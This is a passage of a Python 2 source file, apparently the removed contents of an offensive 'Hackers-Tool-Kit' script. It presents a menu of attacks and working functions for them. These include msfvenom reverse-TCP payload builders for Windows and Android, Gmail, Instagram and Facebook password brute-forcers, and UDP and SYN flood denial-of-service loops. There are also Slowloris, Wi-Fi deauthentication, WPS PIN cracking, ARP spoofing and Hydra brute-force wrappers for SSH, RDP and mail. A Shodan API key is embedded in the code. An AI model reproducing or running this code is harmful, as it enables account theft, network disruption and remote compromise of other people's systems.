-wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# 